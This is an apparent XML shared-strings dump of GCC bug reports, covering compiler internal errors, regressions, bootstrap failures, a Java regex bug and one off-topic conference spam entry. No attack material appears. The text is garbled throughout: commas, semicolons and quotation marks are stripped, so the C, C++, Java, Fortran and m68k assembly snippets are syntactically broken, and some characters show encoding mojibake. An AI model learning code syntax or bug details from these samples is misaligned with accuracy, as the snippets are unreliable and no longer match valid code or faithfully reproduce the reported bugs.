    <t>C++ FE gives names to anonymous things</t>
  </si>
  <si>
    <t>The C++ FE insists on giving TYPE_NAMEs to things like anonymous unions.  This
confuses type compatibility checks in LTO which now needs to workaround this
duplicating the ANON_AGGRNAME_FORMAT logic from cp/cp-tree.h
Maybe the C++ FE should free those names in the free_lang_data langhook.
What does it need the names for?  Mangling?</t>
  </si>
  <si>
    <t>GCC-65238</t>
  </si>
  <si>
    <t>[5 Regression] __has_attribute is not handled properly with -traditional-cpp.</t>
  </si>
  <si>
    <t>Created attachment 34890
trivial test-case.
between r218893 and 218951 the handling of __has_attribute has regressed for -traditional-cpp (-E)
(as an example) gcc.dg/cpp/trad/include.c has started to fail with excess errors - if run manually:
$ ./gcc/xgcc -Bgcc /GCC/gcc-trunk/gcc/testsuite/gcc.dg/cpp/trad/include.c -traditional-cpp  -E -m32 -o include.i
In file included from /usr/include/Availability.h:145:0
                 from /usr/include/stdlib.h:62
                 from /GCC/gcc-trunk/gcc/testsuite/gcc.dg/cpp/trad/include.c:13:
/usr/include/AvailabilityInternal.h:1036:0: error: missing '(' after __has_attribute
     #ifdef __has_attribute
 ^
/usr/include/AvailabilityInternal.h:1037:0: error: missing '(' after __has_attribute
         #if __has_attribute(availability)
 ^
=====
The trivial test-case compiles fine with:
$ ./gcc/xgcc -Bgcc has-attr.c -E -o t.i
and with :
$ ./gcc/xgcc -Bgcc has-attr.c -E -traditional-cpp -o t.i
has-attr.c:3:0: error: missing '(' after __has_attribute
 # if __has_attribute(__totally_non_existant__)
 ^
cc1(52597) malloc: *** error for object 0x1421194c8: incorrect checksum for freed object - object was probably modified after being freed.
*** set a breakpoint in malloc_error_break to debug
cc1(52597) malloc: *** error for object 0x142119438: incorrect checksum for freed object - object was probably modified after being freed.
*** set a breakpoint in malloc_error_break to debug
====
Of course it seems reasonable to exclude __has_attribute from traditional-cpp - but in that case:
(a) the testsuite needs amendment in some places and
(b) use of the tag should not cause the free error.</t>
  </si>
  <si>
    <t>GCC-41180</t>
  </si>
  <si>
    <t>can not build gcc 4.4.1 on Snow Leopard Mac OS X 10.6</t>
  </si>
  <si>
    <t>Hi
I'm not able to build gcc 4.4.1 on Snow Leopard Mac Pro (
gmp 4.3.1 and mpfr 2.4.1 were  built without problem
#gmp
cd gmp-4.3.1
./configure --prefix=/home/dmarkman/Development/GCC/macintel64/gmp-4.3.1/build
make 
make install
make check
#mpfr
cd ../mpfr-2.4.1
./configure --prefix=/home/dmarkman/Development/GCC/macintel64/mpfr-2.4.1/build --with-gmp=/home/dmarkman/Development/GCC/macintel64/gmp-4.3.1/build
make 
make install
make check
#gcc
cd ../gcc-4.4.1 
./configure --prefix=/home/dmarkman/Development/GCC/macintel64/mpfr-2.4.1/build --with-gmp=/home/dmarkman/Development/GCC/macintel64/gmp-4.3.1/build
make
make compalins about incompatible library arch.
gmp and mpfr were built as x86_64 libraries 
I verified it with file command
so I just forced some flags to be x86_64:
setenv LDFLAGS -arch x86_64
setenv CFLAGS   -arch x86_64
setenv CXXFLAGS -arch x86_64
setenv CPPFLAGS -arch x86_64
make clean
make distclean
./configure --prefix=/home/dmarkman/Development/GCC/macintel64/mpfr-2.4.1/build --with-gmp=/home/dmarkman/Development/GCC/macintel64/gmp-4.3.1/build
make
and after that I got another error:
checking for i386-apple-darwin10.0.0-gcc... /Volumes/Macintosh_HD/Users/Shared/Development/GCC/gcc-4.4.1/host-i386-apple-darwin10.0.0/gcc/xgcc -B/Volumes/Macintosh_HD/Users/Shared/Development/GCC/gcc-4.4.1/host-i386-apple-darwin10.0.0/gcc/ -B/home/dmarkman/Development/GCC/macintel64/gcc-4.4.1/build/i386-apple-darwin10.0.0/bin/ -B/home/dmarkman/Development/GCC/macintel64/gcc-4.4.1/build/i386-apple-darwin10.0.0/lib/ -isystem /home/dmarkman/Development/GCC/macintel64/gcc-4.4.1/build/i386-apple-darwin10.0.0/include -isystem /home/dmarkman/Development/GCC/macintel64/gcc-4.4.1/build/i386-apple-darwin10.0.0/sys-include
checking for suffix of object files... configure: error: in `/Volumes/Macintosh_HD/Users/Shared/Development/GCC/gcc-4.4.1/i386-apple-darwin10.0.0/libgcc':
configure: error: cannot compute suffix of object files: cannot compile
See `config.log' for more details.
make[2]: *** [configure-stage1-target-libgcc] Error 1
make[1]: *** [stage1-bubble] Error 2
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>dmarkman</t>
  </si>
  <si>
    <t>GCC-13211</t>
  </si>
  <si>
    <t>using -### warns about unused linker file</t>
  </si>
  <si>
    <t>Do:
touch test.o
gcc -### test.o
And you will get a warning about an unused linker file which is not true.</t>
  </si>
  <si>
    <t>GCC-32014</t>
  </si>
  <si>
    <t>new gcc failures</t>
  </si>
  <si>
    <t>With the 4.3.0 20070518 snapshot (see PR32009) I have the following new failures:
Native configuration is powerpc-apple-darwin7.9.0
                === gcc tests ===
Schedule of variations:
    unix
...
Running /Users/dominiq/test/gcc-4.3-20070518/gcc/testsuite/gcc.dg/vect/vect.exp ...
FAIL: gcc.dg/vect/vect-64.c (internal compiler error)
FAIL: gcc.dg/vect/vect-64.c (test for excess errors)
WARNING: gcc.dg/vect/vect-64.c compilation failed to produce executable
FAIL: gcc.dg/vect/vect-68.c (internal compiler error)
FAIL: gcc.dg/vect/vect-68.c (test for excess errors)
WARNING: gcc.dg/vect/vect-68.c compilation failed to produce executable
FAIL: gcc.dg/vect/vect-70.c (internal compiler error)
FAIL: gcc.dg/vect/vect-70.c (test for excess errors)
WARNING: gcc.dg/vect/vect-70.c compilation failed to produce executable
FAIL: gcc.dg/vect/vect-intfloat-conversion-4a.c scan-tree-dump-times vectorized 1 loops 1
FAIL: gcc.dg/vect/vect-intfloat-conversion-4b.c scan-tree-dump-times vectorized 1 loops 1
XPASS: gcc.dg/vect/vect-iv-4.c scan-tree-dump-times vectorized 1 loops 1
FAIL: gcc.dg/vect/section-anchors-pr27770.c (test for excess errors)
FAIL: gcc.dg/vect/section-anchors-vect-69.c (test for excess errors)
FAIL: gcc.dg/vect/section-anchors-vect-69.c scan-tree-dump-times Alignment of access forced using peeling 4
...
                === gcc Summary ===
# of expected passes            44735
# of unexpected failures        24
# of unexpected successes       3
# of expected failures          130
# of untested testcases         28
# of unsupported tests          464
/sw/lib/gcc4/bin/gcc  version 4.3.0 20070518 (experimental)
WARNING: Couldn't find the global config file.
Test Run By dominiq on Sun May 20 20:12:54 2007
Native configuration is powerpc-apple-darwin7.9.0
Is this known/expected?</t>
  </si>
  <si>
    <t>GCC-11611</t>
  </si>
  <si>
    <t>[tree-ssa] Bootstrap failure on sparc-linux-gnu</t>
  </si>
  <si>
    <t xml:space="preserve">	The tree-ssa branch doesn't bootstrap on sparc.
Bootstrap comparison failure!
gcc.o differs
real.o differs
make[1]: *** [gnucompare] Error 1
make[1]: Leaving directory `/usr/local/cvs/gcc_tree_ssa/sparc32/gcc'
make: *** [bootstrap] Error 2
j
Environment:
System: Linux squirrel 2.4.19 #1 Sat Oct 5 15:26:43 EDT 2002 sparc GNU/Linux
Architecture: sparc
host: sparc-unknown-linux-gnu
build: sparc-unknown-linux-gnu
target: sparc-unknown-linux-gnu
configured with: ../gcc/configure --enable-languages=cc++ --disable-multilib --enable-threads=posix : (reconfigured) ../gcc/configure --enable-languages=cc++ --disable-multilib --enable-threads=posix
How-To-Repeat:
	make boostrap</t>
  </si>
  <si>
    <t>ja2morri</t>
  </si>
  <si>
    <t>GCC-62129</t>
  </si>
  <si>
    <t>[4.9/5 Regression] internal compiler error: in output_constant at varasm.c:4755</t>
  </si>
  <si>
    <t>Created attachment 33316
Small example program.
(Google ref: b/17007254)
The following program causes an ICE in output_constant at varasm.c:4755 on the 4.9 branch at r213772 and a similar ICE on trunk:
$ cat b17007254.cc 
class Evaluator
{
    int MakeChangelist ()
    struct CreatorEntry
    {
        char *type
        int (Evaluator::*factory) ()
    }
    static constexpr CreatorEntry kCreators[] = {  
}
constexpr Evaluator::CreatorEntry Evaluator::kCreators[]
$ gcc-archive/4.9/213772/bin/g++ --std=c++11 -c b17007254.cc
b17007254.cc:9:82: warning: deprecated conversion from string constant to â€˜char*â€™ [-Wwrite-strings]
     static constexpr CreatorEntry kCreators[] = {  
                                                                                  ^
b17007254.cc:12:57: internal compiler error: in output_constant at varasm.c:4755
 constexpr Evaluator::CreatorEntry Evaluator::kCreators[]
                                                         ^
0xb21e2a output_constant
        gcc/gcc-4_9-branch/gcc/varasm.c:4755
0xb26102 output_constant
        gcc/gcc-4_9-branch/gcc/varasm.c:4611
0xb26102 output_constructor_regular_field
        gcc/gcc-4_9-branch/gcc/varasm.c:4952
0xb26102 output_constructor
        gcc/gcc-4_9-branch/gcc/varasm.c:5231
0xb26102 output_constant
        gcc/gcc-4_9-branch/gcc/varasm.c:4611
0xb26102 output_constructor_regular_field
        gcc/gcc-4_9-branch/gcc/varasm.c:4952
0xb26102 output_constructor
        gcc/gcc-4_9-branch/gcc/varasm.c:5231
0xb2581e assemble_variable(tree_node* int int int)
        gcc/gcc-4_9-branch/gcc/varasm.c:2139
0xb27455 varpool_assemble_decl(varpool_node*)
        gcc/gcc-4_9-branch/gcc/varpool.c:466
0x6df31d output_in_order
        gcc/gcc-4_9-branch/gcc/cgraphunit.c:2011
0x6df31d compile()
        gcc/gcc-4_9-branch/gcc/cgraphunit.c:2248
0x6df5e4 finalize_compilation_unit()
        gcc/gcc-4_9-branch/gcc/cgraphunit.c:2330
0x5946db cp_write_global_declarations()
        gcc/gcc-4_9-branch/gcc/cp/decl2.c:4611
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc-archive/trunk/213772/bin/g++ --std=c++11 -c b17007254.cc
b17007254.cc:9:82: warning: deprecated conversion from string constant to â€˜char*â€™ [-Wwrite-strings]
     static constexpr CreatorEntry kCreators[] = {  
                                                                                  ^
b17007254.cc:12:57: internal compiler error: in output_constant at varasm.c:4734
 constexpr Evaluator::CreatorEntry Evaluator::kCreators[]
                                                         ^
0xe19a5a output_constant
        gcc/gcc-trunk/gcc/varasm.c:4734
0xe206a3 output_constructor_regular_field
        gcc/gcc-trunk/gcc/varasm.c:4929
0xe206a3 output_constructor
        gcc/gcc-trunk/gcc/varasm.c:5195
0xe19a87 output_constant
        gcc/gcc-trunk/gcc/varasm.c:4735
0xe206a3 output_constructor_regular_field
        gcc/gcc-trunk/gcc/varasm.c:4929
0xe206a3 output_constructor
        gcc/gcc-trunk/gcc/varasm.c:5195
0xe19a87 output_constant
        gcc/gcc-trunk/gcc/varasm.c:4735
0xe22235 assemble_variable(tree_node* int int int)
        gcc/gcc-trunk/gcc/varasm.c:2175
0xe23d03 varpool_node::assemble_decl()
        gcc/gcc-trunk/gcc/varpool.c:553
0x8475ae output_in_order
        gcc/gcc-trunk/gcc/cgraphunit.c:2012
0x8475ae compile()
        gcc/gcc-trunk/gcc/cgraphunit.c:2249
0x848bc4 finalize_compilation_unit()
        gcc/gcc-trunk/gcc/cgraphunit.c:2331
0x638155 cp_write_global_declarations()
        gcc/gcc-trunk/gcc/cp/decl2.c:4644
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-6407</t>
  </si>
  <si>
    <t>compiler crash</t>
  </si>
  <si>
    <t>gcc 2.95.3 (as included in FreeBSD 4.5) doesn't ICE on this code.
Release:
gcc version 3.0.4
Environment:
FreeBSD 4.5
gcc 3.0.4 compiled from FreeBSD's ports.
Reading specs from /usr/local/lib/gcc-lib/i386-portbld-freebsd4.5/3.0.4/specs
Configured with: ./..//gcc-3.0.4/configure --disable-nls --with-gnu-as --with-gnu-ld --with-gxx-include-dir=/usr/local/lib/gcc-lib/i386-portbld-freebsd4.5/3.0.4/include/g++ --disable-shared --prefix=/usr/local i386-portbld-freebsd4.5
Thread model: posix
gcc version 3.0.4
How-To-Repeat:
gcc30 -c -Wall -W -Wall -O2 -march=k6 -mcpu=k6 -g -o ad_vorbis.o ad_vorbis.i</t>
  </si>
  <si>
    <t>rguyom</t>
  </si>
  <si>
    <t>GCC-20435</t>
  </si>
  <si>
    <t>regex pattern compiling bug</t>
  </si>
  <si>
    <t>The following test code (derived from the blojsom wiki code) exposes a bug in
our regex compiler....
import java.util.regex.Pattern
public class pat
{
    private static final String YMD_PERMALINK_REGEX =
/(\\d\\d\\d\\d)/(\\d{12}+)/(\\d{12}+)/(.+)
    private static final Pattern YMD_PERMALINK_PATTERN =
Pattern.compile(YMD_PERMALINK_REGEX Pattern.UNICODE_CASE)
    public static void main (String[] args)
    {
        System.out.println (ok)
    }
}
This should print ok but instead we get:
$ gij pat
Exception in thread main java.lang.ExceptionInInitializerError
   at java.lang.Class.initializeClass() (/usr/lib/libgcj.so.6.0.0)
   at java.lang.Class.forName(java.lang.String boolean java.lang.ClassLoader)
(/usr/lib/libgcj.so.6.0.0)
   at java.lang.Class.forName(java.lang.String) (/usr/lib/libgcj.so.6.0.0)
   at gnu.java.lang.MainThread.run() (/usr/lib/libgcj.so.6.0.0)
Caused by: java.util.regex.PatternSyntaxException: At position 8 in regular
expression pattern:
attempted to repeat a token that is already repeated
        /(\d\d\d\d)/(\d{12}+)/(\d{12}+)/(.+)
                ^
   at java.util.regex.Pattern.Pattern(java.lang.String int)
(/usr/lib/libgcj.so.6.0.0)
   at java.util.regex.Pattern.compile(java.lang.String int)
(/usr/lib/libgcj.so.6.0.0)
   at pat.() (Unknown Source)
   at java.lang.Class.initializeClass() (/usr/lib/libgcj.so.6.0.0)
   ...3 more</t>
  </si>
  <si>
    <t>GCC-42863</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] with auto increments</t>
  </si>
  <si>
    <t xml:space="preserve">
This is a general m68k code generation regression. Starting with revision
150588 GCC for m68k generates surprising code for auto increments eg.
for a strlcpy implementation. Compiling this code with the 4.5.0 snapshot
from 20100107 yields:
-- 4.5.0 --
_strlcpy:
	movel d3sp@-
	movel d2sp@-
	movel sp@(16)d0
	movel sp@(20)d1
	jeq L7
	movel d0a0
	movel sp@(12)a1
L3:
	movel a0d2
	subql #1d1
	jeq L11
	moveb a0@+d2
	moveb d2a1@+
	movel a0d3 | &lt;--
	tstb d2     | &lt;--
	jne L3
L4:
	subl d3d0
	notl d0
	movel sp@+d2
	movel sp@+d3
	rts
L7:
	movel d0d2
	movel d2a0
L6:
	moveb a0@+d1
	movel a0d3 | &lt;--
	tstb d1     | &lt;--
	jeq L4
	moveb a0@+d1
	movel a0d3 | &lt;--
	tstb d1     | &lt;--
	jne L6
	jra L4
L11:
	clrb a1@
	movel d2a0
	jra L6
-- cut --
Suddenly GCC inserts useless moves and because of these moves has also
to generate explicit tst instructions. Older GCC versions generated better
code by using tst.b incrementing an address register without extra move
instructions i.e. 4.4.0:
-- 4.4.0 (release) --
_strlcpy:
	movel d2sp@-
	movel sp@(8)a1
	movel sp@(12)d0
	movel sp@(16)d1
	jne L2
	movel d0a0
L8:
	tstb a0@+
	jne L8
L5:
	subl a0d0
	notl d0
	movel sp@+d2
	rts
L2:
	movel d0a0
	subql #1d1
	jeq L11
L6:
	moveb a0@+d2
	moveb d2a1@
	jeq L5
	addql #1a1
	subql #1d1
	jne L6
L11:
	clrb a1@
	tstb a0@+
	jne L8
	jra L5
-- cut --
Environment:
System: FreeBSD 6.3-STABLE #0: Sat Mar 1 11:12:32 CET 2008 root@sirius:/usr/obj/usr/src/sys/SIRIUS i386
host: i386-unknown-freebsd6.3
build: i386-unknown-freebsd6.3
target: m68k-unknown-amigaos
configured with: ../gcc-4.5-gg/configure --disable-nls --disable-libssp --enable-languages=c --with-gmp=/usr/local --disable-tls --target=m68k-amigaos
How-To-Repeat:
Compiling the following code with
  gcc-4.5.0 -O2 -fomit-frame-pointer strlcpy.c -o -
demonstrates the problem. FWIW m68k-elf exhibits the very same problem!
-- cut --
typedef unsigned long size_t
size_t
strlcpy(char *dst const char *src size_t n)
{ const char *s = src
  if (n) {
    while (--n)
      if ((*dst++ = *s++) == '\0')
        goto out
    *dst = '\0'
  }
  while (*s++ != '\0')
    continue
out:
   return ~(src - s)
}
-- cut --</t>
  </si>
  <si>
    <t>gnikl</t>
  </si>
  <si>
    <t>GCC-71156</t>
  </si>
  <si>
    <t>PURE interface/definition inconsistency: accepts invalid rejects valid</t>
  </si>
  <si>
    <t>As shown below gfortran 6.1.0 rejects the application of the PURE attribute consistently in a procedure interface body and the corresponding procedure definition. 
Conversely gfortran accepts the inconsistent approach (not shown) of using PURE in the interface body but omitting PURE from the procedure definition.  By contrast the Cray and Intel compilers behave opposite to gfortran: Intel and Cray accept the consistent syntax below and reject the inconsistent syntax in which PURE appears only in the interface body or only in the definition.  If Intel and Cray are correct then gfortran is accepting invalid code and rejecting the complementary valid code and it would be great if a fix could be applied to the 6 and 7 branches.
$ cat consistency.f90 
module my_interface
  implicit none
  interface
    pure module subroutine f
    end subroutine
  end interface
end module 
submodule(my_interface) my_implementation
  implicit none
contains
    pure module subroutine f
    end subroutine
end submodule
$ gfortran -c consistency.f90 
consistency.f90:12:28:
     pure module subroutine f
                            1
Error: Duplicate PURE attribute specified at (1)
$ gfortran --version
GNU Fortran (MacPorts gcc6 6.1.0_0) 6.1.0</t>
  </si>
  <si>
    <t>GCC-6207</t>
  </si>
  <si>
    <t>[alpha osf1 5.0] 'make bootstrap' fails when building libstdc++-v3</t>
  </si>
  <si>
    <t>'make bootstrap' fails on DEC Alpha when trying to build
libstdc++-v3.  Of interest in the output is:
checking host system type... alphaev56-dec-osf5.0
checking build system type... alphaev56-dec-osf5.0
ltcf-cxx.sh: error: problem compiling test program
checking for objdir... .libs
checking for /home/jdh/bug/gcc-3.0.4/gcc/xgcc option to produce PIC...  -DPIC
...
appending configuration tag CXX to libtool
checking for GNU make... make
checking for g++ that will successfully compile libstdc++-v3... configure: error: please upgrade to GCC 3.0 or above
make[1]: *** [configure-target-libstdc++-v3] Error 1
make[1]: Leaving directory `/home/jdh/bug/gcc-3.0.4'
make: *** [bootstrap] Error 2
The attached file contains:
build script
configure log
make log
Release:
gcc-3.0.4
Environment:
OSF1 V5.0 910 alpha</t>
  </si>
  <si>
    <t>jdhedden</t>
  </si>
  <si>
    <t>GCC-50911</t>
  </si>
  <si>
    <t>[4.7 regression] assertion failure in expand_vec_perm_interleave2 with -msse</t>
  </si>
  <si>
    <t>Created attachment 25660
Concatenated testcase
This is a regression introduced by the recent changes in the x86 back-end which are related to vectorization.  If you compile the to-be-gnatchoped testcase with -O3 -msse you get:
eric@atlantis:~/build/gcc&gt; gcc -S -gnatws -O3 -msse loop_optimization9.adb
+===========================GNAT BUG DETECTED==============================+
| 4.7.0 20111028 (experimental) [trunk revision 180610] (i586-suse-linux-gnu) GCC error:|
| in expand_vec_perm_interleave2 at config/i386/i386.c:35573              |
| Error detected around gcc/ada/rts/s-string.ads:58:4              
This compiles fine with -O3 -msse2 instead.  The testcase can directly be added
to the testsuite as gnat.dg/loop_optimization9.ad[sb].</t>
  </si>
  <si>
    <t>GCC-69389</t>
  </si>
  <si>
    <t>bit field incompatible with OpenMP atomic update</t>
  </si>
  <si>
    <t>gcc 5.2.0 cannot utilize bit fields within an OpenMP atomic update.
Consider the following code (atomic_bitwise_or.c):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#include 
struct BGZF {
    unsigned errcode:16 is_write:2 is_be:2
}
int main(void) {
   struct BGZF A = {0}
#pragma omp parallel
#pragma omp master
#pragma omp atomic update
   A.errcode |= 1
   if (A.errcode != 1) {
       printf(failed\n)
       return 1
   } else {
       printf(success\n)
       return 0
   }
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When compiled without OpenMP it produces the expected result:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ gcc atomic_bitwise_or.c
$ ./a.out
success
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
However it fails to compile when OpenMP is enabled:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ gcc -fopenmp atomic_bitwise_or.c
atomic_bitwise_or.c: In function 'main':
atomic_bitwise_or.c:13:4: error: cannot take address of bit-field 'errcode'
    A.errcode |= 1
    ^
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
gcc version info:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ gcc -v
Using built-in specs.
COLLECT_GCC=/opt/gcc/5.2.0/bin/../snos/bin/gcc
COLLECT_LTO_WRAPPER=/opt/gcc/5.2.0/snos/libexec/gcc/x86_64-suse-linux/5.2.0/lto-wrapper
Target: x86_64-suse-linux
Configured with: ../cray-gcc-5.2.0/configure --prefix=/opt/gcc/5.2.0/snos --disable-nls --libdir=/opt/gcc/5.2.0/snos/lib --enable-languages=cc++fortran --with-gxx-include-dir=/opt/gcc/5.2.0/snos/include/g++ --with-slibdir=/opt/gcc/5.2.0/snos/lib --with-system-zlib --enable-shared --enable-__cxa_atexit --build=x86_64-suse-linux --with-ppl --with-cloog
Thread model: posix
gcc version 5.2.0 20150716 (Cray Inc.) (GCC)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>weeks</t>
  </si>
  <si>
    <t>GCC-3180</t>
  </si>
  <si>
    <t>ICE on bad code.  (calling some undefined functions).</t>
  </si>
  <si>
    <t>ICE on bad code.
Maybe a function-overloading problem.
Called set(doubledoubledouble) on an object with several 
set() functions but none that take doubledoubledouble.
Release:
2.95.3 19991030 (prerelease)
Environment:
Linux Mandrake
kernel 2.2.17-21mdksmp #1 SMP Thu Oct 5 13:03:01 CEST 2000 i686 unknown
How-To-Repeat:
Preprocessed source code (bug.ii) is attached.
Here is the command line and its output:
g++ -v -save-temps              -D_LINUX_ -DDEBUG  -I. -I/u/lpage/workarea/root/usr/simlab/release/autonomousSystems1.1.1/include  -g -Wall -O2 -c bug.cc -o bug.o
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/specs
gcc version 2.95.3 19991030 (prerelease)
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/cpp -lang-c++ -v -I. -I/u/lpage/workarea/root/usr/simlab/release/autonomousSystems1.1.1/include -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -D__OPTIMIZE__ -g -Wall -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di586 -Dpentium -D__i586 -D__i586__ -D__pentium -D__pentium__ -D_LINUX_ -DDEBUG bug.cc bug.ii
GNU CPP version 2.95.3 19991030 (prerelease) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 .
 /u/lpage/workarea/root/usr/simlab/release/autonomousSystems1.1.1/include
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/../../../../include/g++-3
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/../../../../i586-mandrake-linux/include
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/local/include
End of omitted list.
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/cc1plus bug.ii -quiet -dumpbase bug.cc -g -O2 -Wall -version -o bug.s
GNU C++ version 2.95.3 19991030 (prerelease) (i586-mandrake-linux) compiled by GNU C version 2.95.3 19991030 (prerelease).
bug.cc: In function `void blah()':
bug.cc:17: Internal compiler error.
bug.cc:17: Please submit a full bug report.
bug.cc:17: See  for instructions.</t>
  </si>
  <si>
    <t>lpage</t>
  </si>
  <si>
    <t>GCC-7913</t>
  </si>
  <si>
    <t>Congreso Internacional de TelemÃ¡tica CITEL 2002</t>
  </si>
  <si>
    <t xml:space="preserve"> INTERNET2 EN CITEL 2002 (versiÃ³n en espaÃ±ol)
 Internet 2 surge como resultado del desarrollo de la InformÃ¡tica y las Comunicaciones y su convergencia. Es una realidad que los paÃ­ses tienen que trabajar en la creaciÃ³n de redes de alta velocidad con las caracterÃ­sticas tÃ©cnicas de I2 para acelerar s u desarrollo.
 Internet 2 es una realidad en el mundo: estamos en presencia de un evento que tendrÃ¡ y estÃ¡ teniendo una incidencia muy grande sobre la sociedad en su conjunto quizÃ¡s mucho mÃ¡s que la influencia que tuvo el desarrollo de la red ARPA a fines de los aÃ±os  60 con la posterior creaciÃ³n de la red Internet actual.
 Estas razones nos ha impulsado ha incluir un Taller de Internet 2 en el evento CITEL 2002 con la finalidad de transmitir las experiencias de tantos especialistas que ya han emprendido este camino.
 INTERNET2 IN CITEL 2002 (english version)
 Internet 2 arise as a result of the Computer science's and Communications development and  their convergence. It is a reality that the countries have to work in the creation of high-speed networks with the technical characteristics of I2 to accelerate  their development.  
 Internet 2 is a reality in the world: we are in presence of an event that will have and is having a very big incidence on the society in their group maybe much more than the influence that had the development of ARPANET at the end of the years 60 wit h the later creation of the current Internet.  
 These reasons have impelled us it is necessary to include a Workshop of Internet 2 in the event CITEL 2002 with the purpose of transmitting the experiences of so many specialists that have already undertaken this road.
 Marlon MuÃ±oz Miranda 
 Coordinador para Europa
 E-mail: europa@citel.ispjae.edu.cu
 URL: http://www.ispjae.cu/eventos/citel
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-11224</t>
  </si>
  <si>
    <t>[3.4 regression] warning value computed is not used no longer emitted</t>
  </si>
  <si>
    <t xml:space="preserve">Hi  
the attached testcase does no longer emit the value computed is not 
used warning. The regression was introduced somewhere between 2.95.4 and 
gcc 3.0.4 I'm currently trying to find the commit that broke it.  
I compile with g++ -Wall -W -O2 -c unused.cc 
expected output: 
unused.cc: In function `int main()': 
unused.cc:12: warning: value computed is not used 
actual output: </t>
  </si>
  <si>
    <t>GCC-42249</t>
  </si>
  <si>
    <t>unrecognizable insn for 254.gap with sel-sched</t>
  </si>
  <si>
    <t>GCC trunk and 4.4 branch get internal compiler errors when building SPEC CPU2000 test 254.gap with -O2 -fselective-scheduling -fsel-sched-pipelining on powerpc-linux as demonstrated by this minimized testcase:
-----------------------------------------------------------------------
typedef struct TypHeader
{
  unsigned long size
  struct TypHeader **ptr
} *TypHandle
extern TypHandle NewBag (unsigned int type unsigned long size)
typedef unsigned long TypPoint32
TypHandle
QuoPP (TypHandle hdL TypHandle hdR)
{
  TypHandle hdC
  unsigned long degC
  TypPoint32 *ptC
  unsigned long degL
  TypPoint32 *ptL
  unsigned long degR
  TypPoint32 *ptR
  unsigned long p
  degL = ((hdL)-&gt;size) / sizeof (TypPoint32)
  degR = ((hdR)-&gt;size) / sizeof (TypPoint32)
  degC = degL &lt; degR ? degR : degL
  hdC = NewBag (9 (unsigned long) (degC * sizeof (TypPoint32)))
  ptC = (TypPoint32 *) ((TypHandle *) ((hdC)-&gt;ptr))
  for (p = 0 p &lt; degC p++)
    ptC[(((p) &lt; (degR)) ? (ptR)[(p)] : (p))] =
      ((((((p) &lt; (degL)) ? (ptL)[(p)] : (p))) &lt;
        (degR)) ? (ptR)[((((p) &lt; (degL)) ? (ptL)[(p)] : (p)))]
       : ((((p) &lt; (degL)) ? (ptL)[(p)] : (p))))
}
-----------------------------------------------------------------------
Trunk:
elm3b149% /home/janis/tools/gcc-trunk-anonsvn/bin/gcc -O2 -fselective-scheduling -fsel-sched-pipelining -c bug.c
bug.c: In function â€˜QuoPPâ€™:
bug.c:33:1: error: unrecognizable insn:
(insn 176 57 98 11 bug.c:31 (set (reg:CCUNS 199)
        (reg:CCUNS 200)) -1 (nil))
bug.c:33:1: internal compiler error: in extract_insn at recog.c:2097
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
4.4 branch:
elm3b149% /home/janis/tools/gcc-4.4-anonsvn/bin/gcc -O2 -fselective-scheduling -fsel-sched-pipelining -c bug.c
bug.c: In function â€˜QuoPPâ€™:
bug.c:33: error: unrecognizable insn:
(insn 167 91 89 13 bug.c:31 (set (reg:CCUNS 179)
        (reg:CCUNS 180)) -1 (nil))
bug.c:33: internal compiler error: in get_attr_type at config/rs6000/rs6000.md:13160
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-39582</t>
  </si>
  <si>
    <t>bad errors for some uses of [*] arrays</t>
  </si>
  <si>
    <t>With -std=c99 -pedantic-errors the code
void foo11d(int x[sizeof(int *[*])])
receives the diagnostics:
t.c:1: warning: '[*]' not in a declaration
t.c:1: error: ISO C forbids zero-size array 'x'
There certainly isn't a zero-size array (a GNU extension) here there's
a use of [*] arrays that ended up being valid with the final resolution
of DR#341 (see )
and the result of sizeof should be variable not a constant 0 in this
case.</t>
  </si>
  <si>
    <t>GCC-14076</t>
  </si>
  <si>
    <t>[3.4 REgression] ICE in dwarf2out add_abstract_origin_attribute</t>
  </si>
  <si>
    <t>ICE while building alisp.c of alsa-lib-1.0.2 
 gcc -DHAVE_CONFIG_H -I. -I. -I../../include -I../../include -O2 -Wall -W -pipe 
-g -MT alisp.lo -MD -MP -MF .deps/alisp.Tpo -c alisp.c  -fPIC -DPIC 
-o .libs/alisp.o 
alisp.c: In function `F_mod': 
alisp.c:1103: internal compiler error: in add_abstract_origin_attribute at 
dwarf2out.c:9951 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
make[1]: *** [alisp.lo] Error 1 
Here is the code from line 1103: 
static inline struct alisp_object * cdr(struct alisp_object * p) 
{ 
        if (alisp_compare_type(p ALISP_OBJ_CONS)) 
                return p-&gt;value.c.cdr 
        return 
                                                                                             }</t>
  </si>
  <si>
